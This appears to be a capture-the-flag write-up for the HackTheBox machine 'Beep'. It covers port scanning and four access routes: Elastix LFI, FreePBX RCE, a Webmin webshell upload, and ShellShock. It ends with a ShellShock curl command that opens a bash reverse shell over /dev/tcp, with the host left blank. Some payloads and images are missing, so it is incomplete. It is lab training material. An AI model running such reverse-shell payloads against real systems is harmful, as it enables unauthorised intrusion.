Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access.


Due to this machine’s age and the outdated TLS version, issues emerge.
Before we move on, let’s solve a couple of them.


Curl & gobuster

-k, –insecure Allow insecure server connections


I begin as usual with a Nmap scan.

nmap -sC -sV -A -oG beep beep.htb

Multiple ports are open.

|22| ssh OpenSSH 4.3 (protocol 2.0)
|25| smtp
|80| Apache httpd 2.2.3
|110| pop3
|111| rpcbind
|143| imap
|443| Apache httpd 2.2.3
|3306| mysql
|10000| http MiniServ 1.570 (Webmin httpd)

Next, I used Gobuster to find interesting directories.

gobuster dir -u https://beep.htb -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -k

Foothold + Privesc

Method 1 → LFI

After visiting the website I have found a login page that use Elastix.

I looked for possible exploits and found an LFI vulnerability.

You can find the full explanation in ExploitDB

Payload →

After using the payload I found passwords for other portals.

Next I tried to use ssh with following credential to get access.


**Method 2 → Remote Code Execution **

When visiting /admin , It asks for password. If cancel is pressed it took me to FreePBX page.

After logging in we get admin dashboard access.


After researching for a little bit I found this vulnerability in ExploitDB

In order for the exploit to work it requires a valid extension.

We can use svmap to find SIP devices in the network and svwar to bruteforce for valid extension.

We can use INVITE option to reveal all valid extensions.

Afternatively I found the extension in the recordings dashboard as well.

After finding the extension I found a shell in the system.

Method 3 → FileUpload Code Execution

In port 10000 I found Webmin login page. I logged in with valid credentials and found the admin dashboard.


There was already a commandshell option in the site.

There was also a file upload option in the website.

I uploaded a webshell and after visiting the directory I can execute commands.

Then I got a revershell using the webshell I spawned.

Method 4 → ShellShock

While exploring the website I found ![cgi-bin]]().
This reminded me of ShellShock vulnerability.

I got a revershell using the vulnerability.

curl -ks -A "() { :;}; echo Content-Type: text/html; /bin/bash -i >& /dev/tcp/ 0>&1;" https://beep.htb:10000